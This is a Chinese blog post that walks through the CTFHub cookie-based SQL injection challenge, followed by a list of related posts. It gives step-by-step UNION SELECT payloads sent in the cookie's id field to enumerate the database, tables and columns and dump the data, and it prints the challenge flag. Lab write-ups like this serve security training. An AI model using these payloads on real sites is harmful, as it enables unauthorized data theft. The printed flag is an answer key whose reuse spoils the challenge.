CTFHub技能树之WEB:Cookie注入

最新推荐文章于 2024-04-18 06:00:00 发布
最新推荐文章于 2024-04-18 06:00:00 发布
阅读量1.3k 收藏 5
点赞数 1
分类专栏: CTF SQL注入 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48799157/article/details/123621941
版权

小白一个,如有错误请指正!

解法一:使用Burpsuite抓包

1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater

2.在Repeater界面发送数据包,发现可以看到返回的数据

 

3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段

 有回显

有回显

 没有回显

4.爆数据库

id=123 union select 1,database()#

5.爆表名

id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

 

6.爆字段

id=123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'mfzmvlaeny'

 

 7.爆flag

id=123 union select 1,wsraaoxtwe from sqli.mfzmvlaeny

成功拿到flag

ctfhub{8c252e1556403bd315451c7a}

目前只知道一种解法,后续更新~

 

weixin_48799157
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
这个资源库"CTF-AWD-WEB-master"提供的试题将帮助参与者提升他们的实战技能,深入理解Web安全攻防的原理,并能够在实际环境中应用这些知识。通过解题,不仅可以锻炼漏洞挖掘和修复能力,还可以提升安全意识,对于...
LotusPhp笔记之:Cookie组件的使用详解
12-19
例如,设置一个名为`userName`,值为`我是帅哥`,一小时后过期的Cookie: ```php $cookie->setCookie('userName', '我是帅哥', time()+3600); ``` 读取Cookie使用`getCookie`方法,传入Cookie的名称即可: ```php...
CTFHub - Cookie注入
Have_a_great_day的博客
09-10 795
因为在CTFHubweb内SQL板块使用的是同一个数据库,所以列数是相同的。table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。table_schema=database() :选择当前连接的数据库(sqli)中的所有表。可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。【news】表一直都存在,所以第一想法先不考虑此表中的内容。
CTFHub | Cookie注入,UA注入,Refer注入,过滤空格(利用hackbar插件)
qq_73861475的博客
11-18 982
User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。一些网站会把用户的 UA 首部信息写入数据库,用来收集和统计用户信息,如果操作不当就有可能会导致 UA 注入。【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)_sql注入教程_网络安全-李彦暗的博客-CSDN博客1、界面能够回显数据库查询到的数据(必要条件);2、界面回显内容至少能够显示数据库中的某列数据(必要条件);
CTF-WEB篇 攻防世界题目实战解析cookie
最新发布
2301_76565920的博客
04-18 745
题目:cookie 难度:1
CTFHUB-Cookie注入
Web学习之路
03-28 204
cookie
【SQL注入cookie注入:原理、步骤、示例
07-08 4568
【SQL-cookie注入
CTFhub Cookie注入
plant1234的博客
06-18 736
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
ctfhub sql注入cookie注入
2303_81631620的博客
04-04 775
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
CTFHub-sql注入-Cookie注入
weixin_51706044的博客
06-06 1218
文章目录Cookie注入解法二 Cookie注入 cookie注入和以往的题目有所不同,注入点是在cookie中 查看该页面的Cookie 可以看到这里的Cookie是id=1 进行测试是否为Cookie注入 burp进行抓包注入 判断列数 可以看到列数为2的时候回显正常,因此判断列数为2 进行联合查询 爆数据库 id=1 union select 1,database() 爆数据表 id=13 union select 1,group_concat(table_name) from inf
Web应用安全:Cookie参数越权.pptx
06-18
Web应用安全:Cookie参数越权】 Web应用安全是一个至关重要的领域,因为它涉及到用户的隐私和数据保护。在本文中,我们将深入探讨一个特定的安全威胁——Cookie参数越权,这是一种允许攻击者非法访问与他们拥有...
Web应用安全:Cookie参数越权习题习题.docx
06-17
Web 应用安全中,Cookie 参数越权只是其中的一种攻击方式,还有其他攻击方式,如 SQL 注入、跨站脚本攻击、跨站请求伪造等。因此,需要对 Web 应用安全进行全面的考虑,包括服务器端、客户端和网络传输等各个方面...
Web应用安全:HTTPCookie的缺点.pptx
06-17
开发人员应当遵循最佳实践,限制Cookie的用途,谨慎处理敏感数据,以及确保在设置Cookie时考虑到传输安全,以提高Web应用的安全水平。通过严格控制Cookie的使用和输出,可以大大降低Web应用遭受攻击的风险,保护用户...
CTF之web——cookie
weixin_61167540的博客
11-23 1729
在cmd中输入:curl -i http://challenge-5460ffbe35aa75a0.sandbox.ctfhub.com:10800/ --cookie "admin=1"这里之所以设置cookie为admin=1,是因为上图中看到网页的请求头里admin=0,也就是设置的不是admin用户去访问的,改成1就好啦。cookie是存储再客户端上的一小段数据,浏览器(即客户端)通过HTTP协议和服务器端进行cookie交互,通常用来存储一些不敏感信息。
ctfhub技能树—SQL注入COOKIE注入
Naptmn的博客
02-07 443
COOKIE注入 先看一下什么是cookie注入 https://blog.csdn.net/weixin_42277564/article/details/93316222 简单来说,就是将注入点改到了请求包的cookie里面,其他语句和sql注入没有什么区别,那么我们开始用bp抓包 bp抓包后放到repeater中 开始注入 1、查看信息返回的点 2、查看数据库 3、查看表名 4、查看那个奇怪的表的列 5、查看这个奇怪的表里面奇怪的列里面的数据 ok以上即完成注入 一点小小的感悟,以前都是
CTFHub技能树HTTP协议——Cookie
qq_53768302的博客
03-07 234
CTFHub技能树HTTP协议——Cookie
CTFweb篇-Cookies欺骗
热门推荐
weixin_44597701的博客
08-06 1万+
什么是cookie 其实cookies是由网络服务器存储在你电脑硬盘上的一个txt类型的小文件,它和你的网络浏览行为有关,所以存储在你电脑上的cookies就好像你的一张身份证,你电脑上的cookies和其他电脑上的cookies是不一样的;cookies不能被视作代码执行,也不能成为病毒,所以它对你基本无害。 cookie可以在报文头的前面进行设置。 例题: 打开是一连串字母,没有用处 于是从URL入手,http://123.206.87.240:8002/web11/index.php?line=&a
CTFHub-Cookie注入
m0_51589948的博客
05-19 159
** Cookie注入** 根据提示寻找Cookie,对其进行bp抓包,并发包到repeater 对cookie进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_
WHUCTF easyphp代码审计
weixin_44255856的博客
06-09 1764
JSON 数据结构介绍: 按照最简单的形式,可以用下面这样的 JSON 表示 “名称 / 值对” :{ "firstName": "Brett" } 等效的纯文本为firstName=Brett 但是,当将多个"名称 / 值对"串在一起时,JSON 就会体现出它的价值了。首先,可以创建包含多个"名称 / 值对"的 记录,比如: { "firstName": "Brett", "lastName":...
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入”是一种常见的网络攻击手段,通过在输入框等可输入的地方输入特定的数据库操作语句,来实现对数据库的非授权操作。 最后,“cookie”是指在网站上存储用户信息的一种机制,可以通过注入SQL语句来获取其中的敏感信息,如账号密码等。 综上,这道题的意思是在一个CTFHub比赛的环境下,需要使用SQL注入来获取网站的cookie信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值